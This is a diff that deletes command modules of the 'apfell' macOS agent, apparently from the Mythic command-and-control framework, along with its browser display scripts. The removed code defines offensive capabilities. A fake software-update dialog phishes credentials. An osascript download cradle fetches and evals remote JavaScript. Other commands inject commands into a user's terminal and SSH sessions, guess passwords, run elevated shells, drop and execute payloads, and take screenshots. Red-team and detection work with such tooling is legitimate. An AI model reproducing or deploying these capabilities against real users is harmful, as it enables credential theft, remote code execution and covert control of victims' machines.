- version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1083", "T1007"] - argument_class = PlistArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSMutableDictionary.alloc.initWithContentsOfFile, fileManager.attributesOfItemAtPathError", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/prompt.py b/Payload_Types/apfell/mythic/agent_functions/prompt.py deleted file mode 100644 index 5856d8743..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/prompt.py +++ /dev/null @@ -1,68 +0,0 @@ -from CommandBase import * -import json - - -class PromptArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "title": CommandParameter( - name="title", - type=ParameterType.String, - description="Title of the dialog box", - required=False, - default_value="Application Needs to Update", - ), - "icon": CommandParameter( - name="icon", - type=ParameterType.String, - required=False, - description="full path to .icns file to use", - default_value="/System/Library/CoreServices/Software Update.app/Contents/Resources/SoftwareUpdate.icns", - ), - "text": CommandParameter( - name="text", - type=ParameterType.String, - required=False, - description="additional descriptive text to display", - default_value="An application needs permission to update", - ), - "answer": CommandParameter( - name="answer", - type=ParameterType.String, - required=False, - description="Default answer to pre-populate", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON argument") - else: - raise ValueError("Missing arguments") - - -class PromptCommand(CommandBase): - cmd = "prompt" - needs_admin = False - help_cmd = "prompt" - description = "Create a custom prompt to ask the user for credentials where you can provide titles, icons, text and default answer." 
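Since every prompt parameter above is declared required=False with a default, an empty JSON object appears to be the smallest valid tasking; overriding individual fields is just a matter of supplying them (the title below is illustrative):

    import json

    minimal = "{}"  # falls back to the defaults declared above
    custom = json.dumps({
        "title": "Software Update Required",  # illustrative override
        "answer": "",
    })
    print(minimal)
    print(custom)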
- version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1141"] - argument_class = PromptArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/pwd.py b/Payload_Types/apfell/mythic/agent_functions/pwd.py deleted file mode 100644 index a3da69b0a..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/pwd.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class PwdArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class PwdCommand(CommandBase): - cmd = "pwd" - needs_admin = False - help_cmd = "pwd" - description = "Prints the current working directory for the agent" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1083"] - argument_class = PwdArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="fileManager.currentDirectoryPath", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/rm.py b/Payload_Types/apfell/mythic/agent_functions/rm.py deleted file mode 100644 index c78c35879..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/rm.py +++ /dev/null @@ -1,57 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class RmArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "path": CommandParameter( - name="path", - type=ParameterType.String, - description="Path to file to remove", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - temp_json = json.loads(self.command_line) - if "host" in temp_json: - # this means we have tasking from the file browser rather than the popup UI - # the apfell agent doesn't currently have the ability to do _remote_ listings, so we ignore it - self.add_arg("path", temp_json["path"] + "/" + temp_json["file"]) - else: - self.add_arg("path", temp_json["path"]) - else: - self.add_arg("path", self.command_line) - else: - raise ValueError("Missing arguments") - - -class RmCommand(CommandBase): - cmd = "rm" - needs_admin = False - help_cmd = "rm [path]" - description = "Remove a file, no quotes are necessary and relative paths are fine" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = True - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1106", "T1107"] - argument_class = RmArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="fileManager.removeItemAtPathError", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/run.py 
b/Payload_Types/apfell/mythic/agent_functions/run.py deleted file mode 100644 index e2a6a312a..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/run.py +++ /dev/null @@ -1,59 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class RunArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "args": CommandParameter( - name="args", - type=ParameterType.Array, - description="Arguments to pass to the binary", - ), - "path": CommandParameter( - name="path", - type=ParameterType.String, - description="Full path to binary to execute", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class RunCommand(CommandBase): - cmd = "run" - needs_admin = False - help_cmd = "run" - description = "The command uses the ObjectiveC bridge to spawn that process with those arguments on the computer and get your output back. It is not interactive and does not go through a shell, so be sure to specify the full path to the binary you want to run." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1106"] - argument_class = RunArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="{} {}".format( - task.args.get_arg("path"), - " ".join(task.args.get_arg("args")) - ), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/screenshot.py b/Payload_Types/apfell/mythic/agent_functions/screenshot.py deleted file mode 100644 index 3e579a437..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/screenshot.py +++ /dev/null @@ -1,43 +0,0 @@ -from CommandBase import * -import json -import datetime -from MythicResponseRPC import * - - -class ScreenshotArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ScreenshotCommand(CommandBase): - cmd = "screenshot" - needs_admin = False - help_cmd = "screenshot" - description = "Use the built-in CGDisplay API calls to capture the display and send it back over the C2 channel. 
No need to specify any parameters as the current time will be used as the file name" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - parameters = [] - attackmapping = ["T1113"] - argument_class = ScreenshotArguments - browser_script = BrowserScript(script_name="screenshot", author="@its_a_feature_") - - async def create_tasking(self, task: MythicTask) -> MythicTask: - task.args.command_line += str(datetime.datetime.utcnow()) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.CGDisplayCreateImage($.CGMainDisplayID());, $.NSBitmapImageRep.alloc.initWithCGImage(cgimage);", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/security_info.py b/Payload_Types/apfell/mythic/agent_functions/security_info.py deleted file mode 100644 index 5ae7d7833..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/security_info.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class SecurityInfoArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class SecurityInfoCommand(CommandBase): - cmd = "security_info" - needs_admin = False - help_cmd = "security_info" - description = 'This uses JXA to list some security information about the system by contacting the "System Events" application via Apple Events. This can cause a popup or be denied in Mojave and later' - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1201"] - argument_class = SecurityInfoArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of System Events", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/shell.py b/Payload_Types/apfell/mythic/agent_functions/shell.py deleted file mode 100644 index 3986920fd..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/shell.py +++ /dev/null @@ -1,57 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ShellArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "command": CommandParameter( - name="command", type=ParameterType.String, description="Command to run" - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("command", self.command_line) - else: - raise ValueError("Missing arguments") - - -class ShellCommand(CommandBase): - cmd = "shell" - needs_admin = False - help_cmd = "shell {command}" - description = """ - This runs {command} in a terminal by leveraging JXA's Application.doShellScript({command}). - -WARNING! THIS IS SINGLE THREADED, IF YOUR COMMAND HANGS, THE AGENT HANGS! 
- """ - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1059"] - argument_class = ShellArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/bin/sh -c {}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="{}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/shell_elevated.py b/Payload_Types/apfell/mythic/agent_functions/shell_elevated.py deleted file mode 100644 index 9769f27ec..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/shell_elevated.py +++ /dev/null @@ -1,90 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ShellElevatedArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "command": CommandParameter( - name="command", - type=ParameterType.String, - description="Command to execute", - ), - "use_creds": CommandParameter( - name="use_creds", - type=ParameterType.Boolean, - description="Use supplied creds or prompt the user for creds", - ), - "user": CommandParameter( - name="user", type=ParameterType.Credential_Account, - required=False - ), - "credential": CommandParameter( - name="credential", type=ParameterType.Credential_Value, - required=False - ), - "prompt": CommandParameter( - name="prompt", - type=ParameterType.String, - description="What prompt to display to the user when asking for creds", - required=False - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class ShellElevatedCommand(CommandBase): - cmd = "shell_elevated" - needs_admin = False - help_cmd = "shell_elevated" - description = """ - The command will pop a dialog box for the user asking for them to authenticate (fingerprint reader too) so that the command you entered will be executed in an elevated context. Alternatively, you can supply a username and password and the command will run under their context (assuming they have the right permissions). Once you successfully authenticate, you have a time window where no more popups will occur, but you'll still execute subsequent commands in an elevated context. - -WARNING! THIS IS SINGLE THREADED, IF YOUR COMMAND HANGS, THE AGENT HANGS! 
- """ - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1059", "T1141", "T1169"] - argument_class = ShellElevatedArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 15 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c {}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c {}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c {}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/bin/sh -c {}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="{}".format(task.args.get_arg("command")), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/sleep.py b/Payload_Types/apfell/mythic/agent_functions/sleep.py deleted file mode 100644 index 7bc370306..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/sleep.py +++ /dev/null @@ -1,64 +0,0 @@ -from CommandBase import * -import json - - -def positiveTime(val): - if val < 0: - raise ValueError("Value must be positive") - - -class SleepArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "jitter": CommandParameter( - name="jitter", - type=ParameterType.Number, - validation_func=positiveTime, - required=False, - description="Percentage of C2's interval to use as jitter", - ), - "interval": CommandParameter( - name="interval", - type=ParameterType.Number, - required=False, - validation_func=positiveTime, - description="Number of seconds between checkins", - ), - } - - async def parse_arguments(self): - if self.command_line[0] != "{": - pieces = self.command_line.split(" ") - if len(pieces) == 1: - self.add_arg("interval", pieces[0]) - elif len(pieces) == 2: - self.add_arg("interval", pieces[0]) - self.add_arg("jitter", pieces[1]) - else: - raise Exception("Wrong number of parameters, should be 1 or 2") - else: - self.load_args_from_json_string(self.command_line) - - -class SleepCommand(CommandBase): - cmd = "sleep" - needs_admin = False - help_cmd = "sleep [interval] [jitter]" - description = "Modify the time between callbacks in seconds." 
- version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1029"] - argument_class = SleepArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/spawn_download_cradle.py b/Payload_Types/apfell/mythic/agent_functions/spawn_download_cradle.py deleted file mode 100644 index ad88605fe..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/spawn_download_cradle.py +++ /dev/null @@ -1,51 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class SpawnDownloadCradleArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "url": CommandParameter( - name="url", - type=ParameterType.String, - description="full URL of hosted payload", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("url", self.command_line) - else: - raise ValueError("Missing arguments") - - -class SpawnDownloadCradleCommand(CommandBase): - cmd = "spawn_download_cradle" - needs_admin = False - help_cmd = "spawn_download_cradle" - description = "Spawn a new osascript download cradle as a backgrounded process to launch a new callback" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = SpawnDownloadCradleArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="/usr/bin/osascript -l JavaScript -e \"eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('{}')),$.NSUTF8StringEncoding)));\"".format(task.args.get_arg("url")), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/spawn_drop_and_execute.py b/Payload_Types/apfell/mythic/agent_functions/spawn_drop_and_execute.py deleted file mode 100644 index 2e6b91248..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/spawn_drop_and_execute.py +++ /dev/null @@ -1,68 +0,0 @@ -from CommandBase import * -import json -from MythicFileRPC import * -from MythicPayloadRPC import * -import asyncio - - -class SpawnDropAndExecuteArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "template": CommandParameter( - name="template", - type=ParameterType.Payload, - description="apfell agent to use as template to generate a new payload", - supported_agents=["apfell"], - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class SpawnDropAndExecuteCommand(CommandBase): - cmd = "spawn_drop_and_execute" - needs_admin = False - help_cmd = "spawn_drop_and_execute" - description = "Generate a new payload, drop it to a temp location, execute it with 
osascript as a background process, and then delete the file. Automatically reports back the temp file it created" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = SpawnDropAndExecuteArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - gen_resp = await MythicPayloadRPC(task).build_payload_from_template( - task.args.get_arg("template") - ) - if gen_resp.status == MythicStatus.Success: - # we know a payload is building, now we want it - while True: - resp = await MythicPayloadRPC(task).get_payload_by_uuid(gen_resp.uuid) - if resp.status == MythicStatus.Success: - if resp.build_phase == "success": - # it's done, so we can register a file for it - task.args.add_arg("template", resp.agent_file_id) - break - elif resp.build_phase == "error": - raise Exception( - "Failed to build new payload: " + resp.error_message - ) - else: - await asyncio.sleep(1) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/system_info.py b/Payload_Types/apfell/mythic/agent_functions/system_info.py deleted file mode 100644 index 2ce692d3e..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/system_info.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class SystemInfoArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class SystemInfoCommand(CommandBase): - cmd = "system_info" - needs_admin = False - help_cmd = "system_info" - description = "This uses JXA to get some system information. It doesn't send Apple Events to any other applications though, so it shouldn't cause popups." 
- version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1082"] - argument_class = SystemInfoArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="currentApp.systemInfo()", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/terminals_read.py b/Payload_Types/apfell/mythic/agent_functions/terminals_read.py deleted file mode 100644 index b516c9495..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/terminals_read.py +++ /dev/null @@ -1,58 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class TerminalsReadArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "level": CommandParameter( - name="level", - type=ParameterType.ChooseOne, - choices=["contents", "history"], - description="How much data to retrive - what's viewable or all history", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class TerminalsReadCommand(CommandBase): - cmd = "terminals_read" - needs_admin = False - help_cmd = "terminals_read" - description = """ - This uses AppleEvents to read information about open instances of Apple's Terminal.app. The contents flag allows you to see exactly what the user can see at that moment on the screen. The history flag allows you to see everything that's in that tab's scroll history. This can be a lot of information, so keep that in mind. This function will also give you the window/tab information for each open session and a bunch of other information. 
-Ex: terminals_read history - """ - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1139", "T1056"] - argument_class = TerminalsReadArguments - browser_script = BrowserScript( - script_name="terminals_read", author="@its_a_feature_" - ) - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of Terminal", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/terminals_send.py b/Payload_Types/apfell/mythic/agent_functions/terminals_send.py deleted file mode 100644 index 4e604e088..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/terminals_send.py +++ /dev/null @@ -1,69 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class TerminalsSendArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "window": CommandParameter( - name="window", - type=ParameterType.Number, - description="window # to send command to", - ), - "tab": CommandParameter( - name="tab", - type=ParameterType.Number, - description="tab # to send command to", - ), - "command": CommandParameter( - name="command", - type=ParameterType.String, - description="command to execute", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class TerminalsSendCommand(CommandBase): - cmd = "terminals_send" - needs_admin = False - help_cmd = "terminals_send" - description = """ - This uses AppleEvents to inject the shell command, {command}, into the specified terminal shell as if the user typed it from the keyboard. This is pretty powerful. Consider the instance where the user is SSH-ed into another machine via terminal - with this you can inject commands to run on the remote host. Just remember, the user will be able to see the command, but you can always see what they see as well with the "terminals_read contents" command. 
- """ - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1059", "T1184"] - argument_class = TerminalsSendArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="{}".format( - task.args.get_arg("command"), - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of Terminal", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/test_password.py b/Payload_Types/apfell/mythic/agent_functions/test_password.py deleted file mode 100644 index 8f1447f30..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/test_password.py +++ /dev/null @@ -1,61 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class TestPasswordArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "password": CommandParameter( - name="password", - type=ParameterType.Credential_Value, - description="Password to test", - ), - "username": CommandParameter( - name="username", - type=ParameterType.Credential_Account, - description="Local user to test against", - ), - } - - async def parse_arguments(self): - if self.command_line[0] != "{": - pieces = self.command_line.split(" ") - if len(pieces) < 2: - raise Exception("Wrong number of parameters, should be 2") - self.add_arg("username", pieces[0]) - self.add_arg("password", " ".join(pieces[1:])) - else: - self.load_args_from_json_string(self.command_line) - - -class TestPasswordCommand(CommandBase): - cmd = "test_password" - needs_admin = False - help_cmd = "test_password username password" - description = "Tests a password against a user to see if it's valid via an API call" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1110"] - argument_class = TestPasswordArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.ODNode.nodeWithSessionTypeError, recordWithRecordTypeNameAttributesError", - artifact_type="API Called", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="user.verifyPasswordError", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/upload.py b/Payload_Types/apfell/mythic/agent_functions/upload.py deleted file mode 100644 index 20045b271..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/upload.py +++ /dev/null @@ -1,62 +0,0 @@ -from CommandBase import * -from MythicFileRPC import * -import json - - -class UploadArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "file": CommandParameter( - name="file", type=ParameterType.File, description="file to upload" - ), - "remote_path": CommandParameter( - name="remote_path", - type=ParameterType.String, - description="/remote/path/on/victim.txt", - ), - } - - async def 
parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class UploadCommand(CommandBase): - cmd = "upload" - needs_admin = False - help_cmd = "upload" - description = ( - "Upload a file to the target machine by selecting a file from your computer. " - ) - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = True - author = "@its_a_feature_" - attackmapping = ["T1132", "T1030", "T1105"] - argument_class = UploadArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - original_file_name = json.loads(task.original_params)["file"] - response = await MythicFileRPC(task).register_file( - file=task.args.get_arg("file"), - saved_file_name=original_file_name, - delete_after_fetch=False, - ) - if response.status == MythicStatus.Success: - task.args.add_arg("file", response.agent_file_id) - else: - raise Exception("Error from Mythic: " + response.error_message) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/browser_scripts/clipboard.js b/Payload_Types/apfell/mythic/browser_scripts/clipboard.js deleted file mode 100644 index d71793074..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/clipboard.js +++ /dev/null @@ -1,30 +0,0 @@ -function(task, responses){ - if(task.status === 'error'){ - return "
 Error: untoggle for error message(s) 
"; - } - try{ - if(responses[0]['response'] === "Successfully set the clipboard"){ - return "
 Successfully set the clipboard 
"; - } - let data = JSON.parse(responses[0]['response']); - let output = ""; - let key_list = []; - let specified = false; - for(const [key, value] of Object.entries(data)){ - key_list.push(escapeHTML(key)); - if(key === "public.utf8-plain-text"){ - output = escapeHTML(atob(value)); - }else if(value !== ""){ - specified = true; - } - } - if(specified){ - return "
All Keys: " + key_list.join(", ") + "\n" + escapeHTML(responses[0]['response']) + "
"; - }else{ - return "
All Keys: " + key_list.join(", ") + "\nPlaintext Data:\n" + escapeHTML(output) + "
"; - } - - }catch(error){ - return "
 Error: untoggle for parsing error message(s) 
"; - } -} \ No newline at end of file diff --git a/Payload_Types/apfell/mythic/browser_scripts/create_table.js b/Payload_Types/apfell/mythic/browser_scripts/create_table.js deleted file mode 100644 index de8d5ab49..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/create_table.js +++ /dev/null @@ -1,22 +0,0 @@ -function(headers, data){ - let output = ""; - output += ""; - for(let i = 0; i < headers.length; i++){ - output += ""; - } - output += ""; - for(let i = 0; i < data.length; i++){ - output += ""; - for(let j = 0; j < headers.length; j++){ - if(data[i]['cell-style'].hasOwnProperty(headers[j])){ - output += ""; - } - else{ - output += ""; - } - } - output += ""; - } - output += "
" + headers[i]['name'].toUpperCase() + "
" + data[i][headers[j]['name']] + "" + data[i][headers[j]['name']] + "
"; - return output; -} \ No newline at end of file diff --git a/Payload_Types/apfell/mythic/browser_scripts/download.js b/Payload_Types/apfell/mythic/browser_scripts/download.js deleted file mode 100644 index 717e099fc..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/download.js +++ /dev/null @@ -1,17 +0,0 @@ -function(task, responses){ - if(task.completed === true && task.status !== 'error'){ - try{ - let status = JSON.parse(responses[0]['response']); - if(status.hasOwnProperty('agent_file_id')){ - let file_name = status['filename']; - return "
Finished Downloading " + escapeHTML(file_name) + ". Click here to download
"; - } - }catch(error){ - return "
Error: " + error.toString() + "\n" + escapeHTML(JSON.stringify(responses, null, 2)) + "
"; - } - } - if(task.status === 'error'){ - return "
 Error: untoggle for error message(s) 
"; - } - return "
 Downloading... 
"; -} diff --git a/Payload_Types/apfell/mythic/browser_scripts/list_apps.js b/Payload_Types/apfell/mythic/browser_scripts/list_apps.js deleted file mode 100644 index 89e2dc9bf..000000000 --- a/Payload_Types/apfell/mythic/browser_scripts/list_apps.js +++ /dev/null @@ -1,34 +0,0 @@ -function(task, response){ - if(task.status === 'error'){ - return "
 Error: untoggle for error message(s) 
"; - } - let rows = []; - for(let i = 0; i < response.length; i++){ - try{ - let data = JSON.parse(response[i]['response']); - let row_style = ""; - let cell_style = {}; - Object.keys(data).forEach(function(x){ - let r = data[x]; - let row_style = ""; - if(r['name'].includes("1Password")){row_style="background-color:green;color:white"} - if(r['name'].includes("Term")){row_style="background-color:red;color:white"} - if(r['name'].includes("Snitch")){row_style="background-color:red;color:white"} - if(r['name'].includes("Slack")){row_style="background-color:blue;color:white"} - rows.push({"pid": escapeHTML(r['process_id']), - "name": escapeHTML(r['name']), - "arch": escapeHTML(r['architecture']), - "frontMost": escapeHTML(r['frontMost']), - "bin_path": escapeHTML(r['bin_path']), - "row-style": row_style, - "cell-style": {"hidden": "text-align:center", - "pid":"text-align:center"} - }); - }); - } - catch(error){ - "
Error: " + error.toString() + "\n" + escapeHTML(JSON.stringify(response, null, 2)) + "
